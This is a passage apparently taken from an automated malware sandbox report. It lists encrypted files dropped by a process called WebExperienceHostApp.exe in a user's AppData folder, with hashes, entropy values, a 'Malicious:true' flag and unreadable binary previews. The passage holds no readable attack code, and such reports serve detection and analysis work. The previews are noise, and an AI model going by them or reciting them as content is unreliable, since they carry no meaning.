                                                                  SHA1:612AE912416FD2951C60F275B51E9659905F3631
                                                                  SHA-256:EABBBDF537AD123B3B958D49CC36F4ACEB7E107BA15A0BA249117678C9172D5B
                                                                  SHA-512:F1C14F9465E445D23CCA83B81EA454D6BD8DE0B0F63A148B3308EFA671776A769B5E6E20D59D94A93B632EF4EAD5AEF9A63DDA2FE4FD6F39D5E1C40E52024FC4
                                                                  Malicious:true
                                                                  Preview:v... .~..%...K/6.....j...c..f.!...;.!..zG...W....@...L#-..=i]r9.$.W."ZK2.,....5nnT......Yz...G.3.*...F=.v.4....:..T.....r....D....g:.U.9.k.._....N8....}..q..8.cX..&...3.V;....gx.k.$&}..<..T6...c.aO.).auJ..#B..... T..kv..+...7.&.Sby.*.[n..qS.[.]...Q.:.pn.\_o0..oX....8|...z.o&......W4x.....M.E|q.ey#w..P.jZ.2..y'.....m2..!.!..q(>^.@...6.Q.*..z... .o."..]J8_......u..7.....O.&.m.nEP5.....h.~...`.4.S..K. T../I&..Td.*5.".M%.k.rl.'.C...e.H...D.E..gy...'.....}n..).'.LsP....V.r...0.|...a..l2SC./}.?..J...^&F...\......M..9l...VG=....w.}e{. ...g..wu.=r.j..xh[.:U~|m.4.[..Qt....%.}.^.g..Q.m........e}S..nz`;u...~0g.m..k.$..C...|U..].'7.{...Y.~........3\...|......WP.c.0...-E8..>'.#..>...t.....4....Wz&..3.N.[.o.;.../}.9...t7>CY...q.s~.a=D.Z1.R..Uc..]\. ...>@..Tk.i.I)P...............]..V.....CF x 1X.C...l}...1.t.M.".L.....{.e...`..i.zJr[.q...U....v....j5..~F|.....3.:ND.F.,..d......~.+.w...a7.j..:./.. hb..k.[.7.b.f.({..o..mA%M?!..F..;.*P.S.pu..>...Qw}K...v9...I(.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):78877
                                                                  Entropy (8bit):7.997709985507824
                                                                  Encrypted:true
                                                                  SSDEEP:1536:iY4KGMa7JrAdhz3kb92cF7ASmDmF+dUc6o5FiVgSsTA1gHTucfLAjP1:iY4COlWhK2cF7Fzc6ClLAij0jP1
                                                                  MD5:9E6D44AF2442BC09A2022E324A1D0771
                                                                  SHA1:E83A1D96B00321391909D1BA40641CF37E969305
                                                                  SHA-256:6A5450B25E4079698FD7B79530D97B9C07B92648B89AC3EBC5A4C4BA5A746469
                                                                  SHA-512:6B40FD41D4661C57D95D7E715817F549E2F3C3636089BCBDD70D95C1D05FF121E00889FBEC8E3977B4B7EC3FF3DB51BF5B56B5F87A75425C33A8F08502961010
                                                                  Malicious:true
                                                                  Preview:......p...;...I.Q.+m.U..qG.......p..u..-%..qhy%..l.....(..~..>.N.../..:.s..\.WV.<..v9.....y.0..7.../..........)....>YeS0...a=....3......H...........y.dFa-..x....-..r.[.H..........V.VX..E..$.......Y).)^A...BR'....R.M..............iZ...,. ^+....._..C..P.mT.|...~^..v.n.8d.q..uY...{..FF..O.vC+.......8(.......D..%.......np<...s[....Q.&.;.u.PX.+.a..Rv..E..(.T......c...$...u ..hw:.1v.R....p~..R...f#E..Q.......c.w...+.VB.]hC.|A....U..I.E..`...jX.H7.$....<(NX..s."#9.S.zc.....v.g..}....Q&M9...U....R.p1..fw....4d....R_.x|.{..O....L9.l7........Di@.z.}..^........XY...`l9q..UI..:.pT.....q..@..3....T8.N.J...D..r....iT..xf.k.s.8.6...r...G.dq.R...[pg.J.p^......)..y7v{...f...Wo.?./...A..]..O../.....,...5.4>......Nj...b.G..B*.... i.}.....{4....@G.n.T..zk.S.).9....$....=.... ....@%........xG.m...J......k.....zv.|....k..=.4..v..L5<zT....\.'..;..R.I....n&.......X`...2}.i...P)......j...>...O...^...Z,..!R.GSd....bM.5\..fL`..7.........[xl..I;..f..u1..b%.\|Os....
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:OpenPGP Secret Key
                                                                  Category:dropped
                                                                  Size (bytes):61544
                                                                  Entropy (8bit):7.997153408462792
                                                                  Encrypted:true
                                                                  SSDEEP:1536:HvZHrrQ8N31kOajJXni8rr9QMd8acnTQO2B+eFcD2UbXnGy1W2k:NsWkOajs8neMd8vQl0bXnX8H
                                                                  MD5:3650FB76AE4CFF4726E8872B93E2C12C
                                                                  SHA1:A3A65CC647B6AACE541A8EE594A448630970C8DA
                                                                  SHA-256:206071ECD6E7E8EE9D1EF4AD076A7CC494EA9B3ADD7A19F7722AF5552FCBB8C6
                                                                  SHA-512:9FB164BC611053DEA149D80AC650540440B7BC96E089B097CC01E9CA4F5A63C28D7D795A1305BB0CDBFA3720C446FA4F2B8AAB5296D2B1A14CD9FC8B9F3DDD42
                                                                  Malicious:true
                                                                  Preview:.\sX.].i.<.w..s..m"O$=.]......!...~..T-8..0.%..I....&...*.....R<.........h@u..+8..?..W..Z(.zx=X...j\(.pn.0..M._x...M`.g..JN.d)..p......fn......+...9-P.....5.6C9....e....6....$.......P.z....r..E...W4....+.N;....f......._f..r|l1;.+.%..".s.....H..N.|.a..&.4=......V.I...`ZP.Se.....(..z......z ...t..~;.>Y...X..J....Lo;..^.*.t../[q.P....Q7....~....Z..1.k../....T*.....lt.A=$@.@#D...z[.....9.y..h........I....#*.....M@..x..1..y+f...47^......|7.D...G..b.A1<.c3Q+l.no5_1}q._.!...H...o.(....:.:P.V..s.W.Md\.B.j...?....9..`=.......j9/.....D.G]..^5.,.......P&..iQS_|.v..1}.:H.ry......3.........+.....h.Y..../..t~..m..!.`}.........@.F... ......L..M.z.?.z...mld.&......+7...u..cB...I@R...... .Q..!..Yd=..R.[.C..H...<..,...d..).1..O...^..]+.H.:u.(..7.z....N.l.X....b......%..#X[9.^....{..[.....,.....8.......v.u.FuT...D)c...W.s..d........Ri|O.....)[K..........H?.....p/r.w.@..H.K.8.h.........v.........(.Y....L...vo.{........@...=6.)..].R......tr.........Z
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):70903
                                                                  Entropy (8bit):7.997762273448134
                                                                  Encrypted:true
                                                                  SSDEEP:1536:FoW7zuh08nXqwxjbFHE/R8BxRKYTp1+pK5K:qySh0yXqqRku3RmK5K
                                                                  MD5:3ADA0033CB145EA5F21FA500D7C0892E
                                                                  SHA1:4F708D1E86AD0E17724120C2173E63CA116E0F08
                                                                  SHA-256:837B9E02155A6E0050D32A7CFEA718A0EFAC9BE1438AE27963EED22FB73020C5
                                                                  SHA-512:72739AD51B300C0C79464211A967168291CA802A46697C64EC87DC2A4955935D9D513CFC6A2D2C861FE09A761D14282E05746639A777A7682ED5552167B9222E
                                                                  Malicious:true
                                                                  Preview:..X......8....y.!.j......h...m..u......;K.<..<P...+..F..`....pt.q.JP}....j.:. ..*....E7.!...{.W;W.T.:'.;....c.]U[J.&..b...n5.E..g....1....0.....+...n.,..l..4...r].>.uWR....T.,............v.m.GB.+hY0&tEHG.w.....+++z.8.....m+B#.pk.U..."..$..3.1. ..*.....4....8,.>.$OJ>....'DoL......v..>..w...j..o1..d. ;.8.m..;k.5...J.qLH...5.)...DF).....~......r..}G..5%..........q9...@,..|..m.t1.p...`cu..#t.#.x.XE.N&..aF..X.....?...@.G.t.....<.n>1.**X.KA.....-...).y..r+...D.G...U.1...C.I..[.[.Q..[.O.,.M.3.....:.....K;>.?..s.~......O.S.v..?c...ef....,....@*..*......r.M...:.0....b.ut....P.4j..&.D..dg}..Bb.&..tA..ip.:.VM6~..`'\.#....O.U.nm...p...c[h.).6..g.i............[...T..J|.D...f.....$....."wrd...C.mB....#|.l..B.Z..-pU..2C...#.1P.K..yOC..ms{^.m0..`x..W.....r..|.g..;........*M|}O../[...H~jT..M0Mpc.LY.N.].....0.....Q..2..#6./........I=.0C..h...]....<.+...W.CB.....X.........^...|........V....."..xd.......s.>K.{.........U...by.O.W;...2Z....w2....'..\9.`...].4..y.....0.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):22448
                                                                  Entropy (8bit):7.990462302661758
                                                                  Encrypted:true
                                                                  SSDEEP:384:Ioyf2fiZMsYRaMYfHXMMqASpqDHUY8XXOh9hN5cHW9YsJVS4LZg7KcTz:Ioyf2fidfHXMM5FD0Y4929zVSSZfc/
                                                                  MD5:9FEDAB7983A94C2172ED0C8AD31A4AE0
                                                                  SHA1:2344A10B0AC579D5F7C85B2F123568195CAA1129
                                                                  SHA-256:03C0316AA06175D01772C590729B5861CCAA1E534C50A04C7749FB537FFB96F2
                                                                  SHA-512:3EA7075DB556F51622029F655E13869A1E54619F1D5435C1A55A7EEE0E83EDA826A455026B1D138281697C27B02637CE2FD67F0B2E313ADEDDAD533B9DACA5D6
                                                                  Malicious:true
                                                                  Preview:.....$,.d........a_...Z*..j(...mq.D+ ..h..| ...a....v.......<...Y....7.T...R...?t..iaP.z|^o....sL..=.Q..j.....rC..$-.l.x..<+..R"....>W.}.....p........u..h}.$..f#..Hs....E..../.#`H.\.....T.J.h......t.5qg.8{.c..-.....\......}M.....R..m...V6e...D.T...?0/..n._.2......p3......c...|.5.G...ZV .*..?.ZT7.......w.k2.>.T`._...'7......G.3$....q......0..bnn.u'..rb...!...V........&..Jy.W.F9.j9......*.......\..k).s...o.......(S...L.K.]..XY..'........D....J./..o.eX..@..q#..2a....1.1.....K.....n/...8hYj...<..)...2o.s,3{.[...`$P.....b....Ar.....5......{.og=....$....q..<...#.K'2.\..r....W.^.F.zS-."."..S..TPO+.s4.....W...1u...E..]...#..R.,J...0.....|...SUE-}?m._../.r...H....I0...."0._n....{....!#..Q-.t...|..#.iv...@.-...........X.g.Y".x...J.-...b~.S....4f...`...t.2.5P.....)V..q..]0H.G`;.M.....7F...i..`...7.W$=...$.]wT.jx..~5.....?....f.O8.W....V..*.......1.C.3w,...t.K.y......Y......s...*.l....o. g...Z.eX.R...m.D...z.......Trj`.mZ...(...+i..g.v*..,...
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):31659
                                                                  Entropy (8bit):7.99399133173195
                                                                  Encrypted:true
                                                                  SSDEEP:768:SAbxvE64by57PDhD86oYVMkPRDUGkMYoAMp+V/zJ:SAbxvEjiHtdoYzRDUGkgAMUV
                                                                  MD5:5993A66FEC20A7F56E0F96BA6D4E1C3B
                                                                  SHA1:272995381A0540C694D74CB8EBAE95409D69884C
                                                                  SHA-256:8E16FDEB09B4ECC90704391DF62ED848A7B50395DD566F1B52C8EFDE7CDA8398
                                                                  SHA-512:E9868C86C679E38AA938CDB9EE2E9FF336F7FAF8FF6EEFD0FB1590EEA27C8D60C575BD2575992570C811E8E1D1201F44DDE6D0BD2D02952BA7EBBEF0AE4648FD
                                                                  Malicious:true
                                                                  Preview:.......D.8ou..=@f..h..3..).}.L.gq....N.....o.`]v.r1.RV..M..-P.B.5....CV.../....-....i.6..s.*f0...........l"v>J...[....E.A...uC..Os............6.>......o92.u........n.l.-5..8..IO.}.<.><1....7..c...:..m.V?E?Kkkl..`@.G.=E.....t..K.$...Rc...c....:..w~...:.Yf.l..?Y....B.....D..s..|.n....b...*....@4.1."./.).......D...:..&.w...>n...=v....G..^(.\Xa.u.i.x../1....0p........c./T._h..,.@%.&....M..z..D.....c....1..*bL.A?%[..o..z^o..R..p..G.A3V..|f.5.....G..WXa...h_I...^......... ...N}X9v..HX.!w.~...r..?...\+..Qz2O,.t.H.h.9B.oF..(....?...jt.....-.c.,..a4....;.k..K..+S..Q..uD1....}w.l.............7..%..RY*.~N.....1.<..s..%c.8._u.u]1#'.G.-.... ..#.....H.n=;/.q.... +.?8E),1"C....B...../.r.VX......E.3.]e;.y.Z%w.I.m......Z7YV.l..@'.6.c8S.f.T...s......h...M."......W...-..,|<i...W.(...L.t<.G..&-.....h..a........&Ar....r....O....%T....`.b[J..,$...U.<...^QYSd......+.d..P...^.....M1.F....,....U..;..(e.C.`...m.....*..c..i..F-.^f.x.s.q..*...4..l..b.5..(...W.u(tu
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):64474
                                                                  Entropy (8bit):7.997138619206409
                                                                  Encrypted:true
                                                                  SSDEEP:1536:DVV4ccfHGh0qSMA2PHDOK5iP8LDU8czc6k7fo:DD4cJH5iE88c9kLo
                                                                  MD5:DDF2883051F47CE475DAE1AFB23F7ABF
                                                                  SHA1:476243F58CA6B87B3282455801ACA0259AC6C723
                                                                  SHA-256:D7D2F9ACBAE11A604CD22795D5E8337512CB32577A86BA2917B8AB6388F0E052
                                                                  SHA-512:BBBB7B15EDAF56059A757020F71A3939911F049AD516D9D70E37F2EEA961D6E2267B15EA87DC87C12F45ECBCE6F01DA5BD639C3ADB4B38A0A1656227D4325574
                                                                  Malicious:true
                                                                  Preview:..gD..3.............o.E.....m..r!./#........YR..;7...im..zeN...1.C...B...\.b.......{..%'.!.g..(EL..6..tewH@..{.b"...~..y..........+C..'h.>6..S..."w....#.E_?..Z..S{...X....g..8|..r..U.$..yy.......=.Z5..q....C'l...ub.=\d....;....x....i..~..Kgu.-.T..gs.m...$..#."0...j....N..j...Y..@.(o..I.>...8E./.y.Bs:-.mA....?......}....96..6.Y.._...K.Yl............h.O.i.V.k.Xh...I..L.......=I..qB..Wo.x....O..........t1.K,....n.?G.:......(.._.....+M...`.. .n...*....p}...X...<.....G......nK}....TR...l..C.P...M...n.[4.T"...............Gt.....!M....W5Z.k.......\.7..%AX.8./S.&....>.>.2.......yw.&...B.+.$.....)..?.E#....Ay2....v.j.:.y.T...5.....[.i..G1.....N.."....V..`k@.'(L...V..B.!.RF..O%\E....... *#B.....5..h..j....j.G.Ak.k.G..@.1>........>[.:.b'..........t*\.u.. .....R.L.....X..!......%...%.R..DN....4.....E.9....5....Fw.$.$;.."s$?.T.*..C=...:.sLv.>1.....(tUR...>.8........%.4b.U.....x.X.}.^.l$....A. .n9n..Dy...... ...b.8z.....jO...X.1...I...;..ek....2.IU<*8.w...
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):51995
                                                                  Entropy (8bit):7.996670553920514
                                                                  Encrypted:true
                                                                  SSDEEP:768:SB6bvf3r/Vj8XCYh+6mVu53kdL0IOV7+izG725zUc/VEcbddzACmfKG5Fdt28/b4:SEbvj6XC2RkdLEVvG72Z95Jx1oRt28z4
                                                                  MD5:D9C58337948C75B813FD2D5E82A97AA4
                                                                  SHA1:49F09C4ABA76893A1768FEA3C2A8D1B9824FB363
                                                                  SHA-256:77CF46704A7FDA09D1E918E48D3D53EB6AE7FDFBA930888393D89FB3A828B129
                                                                  SHA-512:0C954FC759A9A1D4EF86B02533378359640888DDBEE6A0A35F1E9E120CF9BB62E5DE18E876E7F9353FE140727472599BD5B89D29CD86DF8041E1F48B87EB6152
                                                                  Malicious:true
                                                                  Preview:.S.`...Z.2.A1l....|.....QOr?......J.......1r...['.@..tI.U'(...$...y...CJ...9_.Q3k.......-./eV.d.g..\y....d.da~U-[.w)3...l...S....Sv......QU....8.a...#..^V..b..}....$D......U.p..F..^.....%..EO.....~..m'.W.{aj....' .5.C........O.G.0,."2...m.tR.)....W...#.....c.SX..v...tb.....#.q......-.....u.........tX1H@.Ee.vX.......e....O.4<..?{>.t.9.....\.......M..h...........r.....v.z_..9G.= ..'%...3/6..4.....Ts>M...\.....*......h...W_........A...y...4......K..bK..../......O......^sf]....]..:.{.;..q...M..;F,...]w.,....'...\..........>_n.4.....U09 \R.............@...T...'.j....x5....3gCa.......+.].az.*cWW....{ =.i+.@..FTu...{....y.a'c={..<.s...2...q..lKu`7.j...Q....+.%.J...._=....|]....-.,.*y>>.'.'..|.'.6w.C.U.z....V.j...,Sj.7!?6.y.S.i.9..O..i...8....LS...=U=....gf.....5.4.K!....8f.i.2.Aq...R..M...h....|..o......5..S......2..f...^._.. ..w...Y.T..u...|0o.~.......T|J'...^.9f ...8..<...!v.y.S.....TR0l.`..q...JV...3.....]......dFF]q.Z.~.#x...=..@k...2
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):31415
                                                                  Entropy (8bit):7.994143485365186
                                                                  Encrypted:true
                                                                  SSDEEP:384:3aVW6crT4edytR/uxt3YT/hGkSAakRI/CzGGra+/8xgXBTCR+3tG6uVztEwzi6SL:3jAtR/sOaRISiAkBeR+SV5mfWuGZiBl9
                                                                  MD5:0A2118A4283B99B879E8F73A8694F099
                                                                  SHA1:A0E8FB80D27F1BF1B4C2873A3FC54523087696BF
                                                                  SHA-256:D7C32146124A7A47F00FDED62330CC22DC444282A3EBAF3CF2D2D9E0878DB6AF
                                                                  SHA-512:DFF1A29AB778540DA045280F6071C033D2CA48AE807084980A619CC369CC749C9323A8AC661BFCBE23E4C3F0ACF2F4CF29A57F816345AB398DA256C4465180CE
                                                                  Malicious:true
                                                                  Preview:a.c.>....2.GH....;_...=XL.._..Ys.....+z......._+q.../k...6.9...d.FL.e.a..<.p.%....*..8..../-.M.(.....Z....S.w..NJ.z.UV.@S...;.J...,..3|......JCwk.....{.....V>N....z.I....n.H..&.L......(...gH.$.H..............>......z..E....j}.....g...`s..U..H...Jh..3...H.......A_..Rf.h_zf...;v.....29i(.W}.......|......{...TTWb.....:..[..v:A./b~.Z6....)....=...+..A...&.'.*...l9K<......9S+._.9.....+?]....b1./N.2.....U.yg.\.X.R.{R}.7H.....\.......Eg.zN.d..rR..[.h,..S..2..,.K.<.J.(P%n..X..H.+VA/>M.@X..V.n.3..k....H%...&.h..U=.Fro9D.....I.z. >..F....^.A..C....3b.k.5.u......A.L...A....?2.iT.8|.Y...>...6..~.J`.O5`T...s......B...v4......./A.........h.o.s.M~[.].,L..$*...e$}...e.$..{b~.%xx..ex....|...t..a.f........e.h.....Zl.....;..e..6Fd..(..a.._Ku.A....z##V..~.-.pn......P..?.....O................U..j:PC.o...dZ.....hp^..4"y..M1..B..-N.vs..p...V.'{;(.\..vL3..h.....\;....Y......WC.._..s...S..$..+..'..k..r.8w......4).<k.;vX.........B..u.......MeH'.....6\S.L..;{.....
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):99465
                                                                  Entropy (8bit):7.997818312765196
                                                                  Encrypted:true
                                                                  SSDEEP:3072:HP8joB8XiAYDPBF36R/9QQH/JtitZP+Cq4h1tRk:qiAYzBF36JlfJtidq2O
                                                                  MD5:095AE6EA21AE2A12BCD1A2359C3D78F1
                                                                  SHA1:143DA0B8E4BDB4377381A141FE4720FDE7D81B3B
                                                                  SHA-256:FC38B2DC72B0EE8181827210581CC4A560AE4A984CAFB91910EE80658841B0E0
                                                                  SHA-512:8C033C5D637EF289DBF28CFAC97DB9961ABEA6469054BC0A2864DE4FFC68765C801ED678CB3A955FD6313AA185FC98FB52BF41D62B10605B2EE2079130467DD2
                                                                  Malicious:true
                                                                  Preview:.6. ?.!...........a_;.[.,.dc.......*j...xc..}...(.....5..b...F.v.He..]...".>;.'...N'R...x..L.T..QTr..G.Z....~.%M.....`...t.......E......u....QR.l...mU.H.z..p.a.j]uH.z...o.D...k=...$J.i....O.1..x..n:4RFiqg..q........P.Q...N...k.<.......K.....v......N.h8.@I....#{.r..Y.'..v..[..u...G..v!.....Ss/...;.zj..p...k..y...>...~.2.W...bT.#.......;.ao8L........?..-........r-.=....J..`..^|..o.R..=.m.5.j...D..>'.a...W....$+m...P..`.^....U.d.....UP.\S| ..IV..u..Gl.eUz.q.....I.zT$.i.\&...r...?.F.jp.x.T9%%4pG#...c...3?y..rD...w........:5..2...Q.u+...N...'ad."..!.85../...N..:.u...i@oI.Y..>.."j"G.YZ.^...g.$.....V%y.^...{......i...... ..l(......T+.~b.v..+.S.4.Ia.~.....e.c2`.......#........G...*..6.5.SF.....p:...z3\&....^....O;.VN.Kf.......m....t.![S^.......&...I.....1.L..E..\o.$.Q...:...>.o.........dG..gb,2.........9..Wbk.}z.7.......T=...Q...B..4...uE.4@eN.../..B.....:....M_......uAFn..b. S.".+.....]..>X<.{.R.@...i..it..K.`..T1..,..%j.\..K...w..`. J...b.g......U.3.<2..V.Y.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):32176
                                                                  Entropy (8bit):7.9940586558098286
                                                                  Encrypted:true
                                                                  SSDEEP:768:7+HfVBVBOdmCIjLCwFT5pASdUSD1u/shaNOwPgMaaAP5hjMkXdRo:q//OdpIXCwF9WSaSDA0hg4qA3RdC
                                                                  MD5:6118044F9E275C917582D65947E8DE41
                                                                  SHA1:6C9C21D007F856100C8B81D7ABA6AE2B48C85DFB
                                                                  SHA-256:E5890EB60C87A566000D78B637DF2812C3169B9E1A8711450A4FBA6A7062299C
                                                                  SHA-512:709FE85D777CD5E8172C63632D19E033739DE1380AAD8FB3151300CA5E0450D8BA5A5DA899D7AD6622DBBBDB9BEAD0AC850275A2F833C98CE24429AED2FD2331
                                                                  Malicious:true
                                                                  Preview:wr.MK.U.}.[....=q.....^..f...[..hVc......v...t=U?DQ..3.8k..g9.D.F1.w..i..2.L...d..8)...F...5.......&;...9.l.....9...s.X7..{h/.U...\...&.....O...Th.t....N..(.....8i,z.kdS..>.G....1.q...kV....#.....nY. J..S.}`..gb.i..w.U./ *.W.x..|...(..._{...LdS+y;.....o>..`.....*Q|3.UD..:F.9.yG"_...N/~.?.......k.16.j.q..6..C9..rD.lA..=.|t.0b..i9'...q..nE.na.S..b...3^DAS..+....<..Y2.........c+.#,....b..q?.6m.\.h}*C.'..c....U.._B.^-I...9a...+.&..~..*../.@.S..X...@.!.B~.JL.a.;..ev3(.....p..s$...W......pxj.....~.4..,.x..e..!... ..z..$X...SL..O8x.?.x..#A...S.....f{u............)-..Q....,.F..H_p.......K....9.....~Wy.I.H.D.e.rr.p....X.|.z+.(...{.P..A.=......j_l..Zj...'/.....5.5f......e..}....im.X(.,.:.t..M..b.ZW..K...o..P........&..3....yHf.CS.j..8..J<g..@m[XYo......[.o..hJ"...w5..:...X.[...;.p*.B_....8...U.{..,F..>..rs..LsV.lk.gOE...M.?@@..C...&..k....]8.....g...1r_.&.....B......l.t..R.=.....5.G....[...M._.\d.......$.T$..)..q.G.I...6S......HX....P....Z.F=..i."
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):91594
                                                                  Entropy (8bit):7.997720136221587
                                                                  Encrypted:true
                                                                  SSDEEP:1536:f9waA66hrRRXi6BMhXBQHKmlAwFkBNHx2Vb8j9od+DawyYVVyrx8xLYL:feVlXiqKAbF+B1Mb8jWd+NyOkVL
                                                                  MD5:0782126BBC13E20E6B8E8F32D932329D
                                                                  SHA1:393DE5EB74893A30FA81D417B1B70A9A639B86C9
                                                                  SHA-256:D3ADBCB5CC190C7E0C592F8568EE47442D84301E6F6A707E2D133D147C5F8546
                                                                  SHA-512:8CE5ED361DAD8C8FFFADE4E5490471AFBE2BB4359E137B7396FFC7E8633FAB4E05709A804BDAD9C6E1B120EB079DEFB0C1C4C44859FC28F36BE3AECE007BED21
                                                                  Malicious:true
                                                                  Preview:.'.K#tx...T..,...i.1..n..*o.U.I.TNZFV.y.....?y...>q.....B1.?.".....w..f[.Q.O.....MO....A..x<q....0!..0...(....|4.:.f.......b..d.g....}.q..?+..@sk_.....k~x...*6....ml.1|..........,.~}5..Gt.G.....L....{O..O.){.n..q&?Q.....9._c............xY}-......i..x4...8.i].l.....f..l...Q_.Z...$.Q...z...,cV..~/..t-...q.....G..&......I...~Kh}6M3Xf..#...V{W.(Hm....D.....a..>.......!.LJ9...N..-?pKJ B?..k5#....s(....0.J.!.....p...'.'.G.r",..7.....$.A....L....#NI.1ft.P.^.h...'L.....$Tz...'.._..o.*.].`..Y....0^@..(.....Q..H....g.n.xk..F]..(...0...Iv&...M.b..E........XD....,vI.....9F..........6..S....:.s.\Y$.N.l....0...]...^*.B.0.K.l.m....'..<.Y.......+m^i.).&c..{..g..;.J.v...2..3%.YH...-..A.'..U..R....(.......Yh....K.....$....cUzX....d?...@C...g...4.O[....2w..s....(..4...![;... j..]y..S....]H;..V=.&../. .G.E..t...`N.Ld.=.am,..[.`9.M.?Q...54.4..*80*z.8x..[.I..p.W...]`0...d.}UEW..TU...E.E..+.m*.....`....+..I8.u..;..:.s[..E.}.p.p..(.5<!<..Gs.W.7.cU...
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):90749
                                                                  Entropy (8bit):7.997795978977805
                                                                  Encrypted:true
                                                                  SSDEEP:1536:1rAtLGb8lc6Pzleb+2+vrai4ZGflYFc+eCDlT7SmnRrTEW4hYTO2laXjYqa8ixUl:ZAYbslPUKBvjFflYmBelCQlf4hN1TBMK
                                                                  MD5:DD3E861F95F80AFFA6238F8BA390E73F
                                                                  SHA1:ACB5E89E2BDD7F55D40BA521027D801D3840C363
                                                                  SHA-256:822635A3922E60D4FE7B361F602CBFD668D8CEE9447A0E47541A0789622153AB
                                                                  SHA-512:3E4BD8D2A0F81B6A83D58888F252976FC59A9764464DC23FD911E984E4B7CB61F20A6E48F53986170376EB10518EAE43058CF3FDA1CDEC31027BD2E33D4AA14E
                                                                  Malicious:true
                                                                  Preview:}...V\..k..>TXBc.F.M...{..J.-BZ.A:Y....BI.c[......+[5.v.t..D.u.^6..Y.$.....Q.t.H....k.L...v.t.5v.=.b..L...j]Edo.Z.\d.QN4[..].S|.C...#.......{i.MHj...r....RE.1/.B...^J6.."...^. ....l.e5x6~9@.,Y.&..g.H,.D..K.`..u5[g..*.bZ.% f.......oQq..GL......F.Z&..Y....{.L...(Ako.8......:..&..$/...n...v[cy.M...L..M.q...a|.....P.2Im.s........f."k..{......oe.<(G..8sp..S.Z.[.O..?.I]|R?....w.n..j.....l.=..I...a.{...eJ.-..|.O..h".?].7.'..>.......[.....g.e......b.y....8....b...\......=..L....X..A?...B+..)...s.4q..LT.lq.f.........~j.0n..Lox....[.....zdO%*.Az.r.....i.-2A.....*OA...1.Z..j....h........!G.....+. ...V...:.._....wM.gP...*.%.....E....h.).V.......t..f.V_..C..nO2..h.l......30(.ds...r6..ez."...F.x*....U.y.....v7.h|.N..7xC.2{y.b..0n.QIIRU..!.......V..W1i.=^..y.....-...T]..>9U9..q.Z..,.s....;.%hE...A.d....7.sb...p.....(3......G.*h...m....W.hH5.jv.@*..DjV..+..y/.F.`..-...H..a7)...I.+......X..|T.Y..{.......S.>)...n........dd.E.. 7I.Z.WUn._..d.D.mU.e..N...'..
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):28032
                                                                  Entropy (8bit):7.992768273668832
                                                                  Encrypted:true
                                                                  SSDEEP:768:sPAPAuZEEvTcI+obiOwcV8dc+a1YrJAR0oyNPx:rLZZvlb1wcp+aY/LNPx
                                                                  MD5:9D8E43C6F6A0437CDC60634940ADE6B3
                                                                  SHA1:593F6EE506254CA335A8B3D20464FB785D4F14B9
                                                                  SHA-256:F50843C177C07596C5D13FC15523EE10D40E3EEE7E0181EDAE4F5F3667F9D730
                                                                  SHA-512:1031C252D0D77A580B1388249C213F7F2BDE5CE3AFE5E627425072A61340277846BB9C518C4835054125B31C94F1CFC49A1119BBD2B4B4EA80E450A389CC003C
                                                                  Malicious:true
                                                                  Preview:.P..M...o.........~.+.,,.....G.H..Ee..gP*.mJ.A...D# .*.z...............v..f9..;....H..s.);..1g.w.....I...@......o..<..n<so..-.'d......].&.%.7....A.6........TE......V.....)..~...S..,...6.~.2..DS7..{b[W.F&D..t..F].%v...g.-V...N+..@.....d..m.......1....6;....^_.M.b0PFl.)!?..3u.so.>v..U|..Z..MO..Y3.. ..d.......)...&.,c.?.."w.,.`...%.'k.C.....>g.p....5..!...#I..8NXD(....iO..........$9....r1&..:..K.;...............v.@.h..t...J....N...i.B8m.m...m...`:..}sy.*..)b..38..a*vt...Y/&V..h.q....:U\F..YN.w.j..u...l..BI.^^....ax.".....o+...H..+...@....?.(..X.e....%..?..E.+|..h..b...z.....K.......+...Dl..f..~{..2....}..U."./_....;A...@.ra...._$A....u.............Y..!6..u8.2w.T...5.....m...'nV....*....f.-._..0...G...U..v..rV......,Ov..,.4#.....l.Y...iH..P.P;{=5}..L...x......U.8..,2[T...m..a\.q.+.N....._.u8i.#d.4....!Yf.6...fd.'.tG..;>Wk..T..}..*M.L..w..9.<:aLr..Ck>....O..*.n...%..CXf..z.x.......C{+H......$x.G....^....S..h.O...........@.1.=5
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):93294
                                                                  Entropy (8bit):7.9979775859394175
                                                                  Encrypted:true
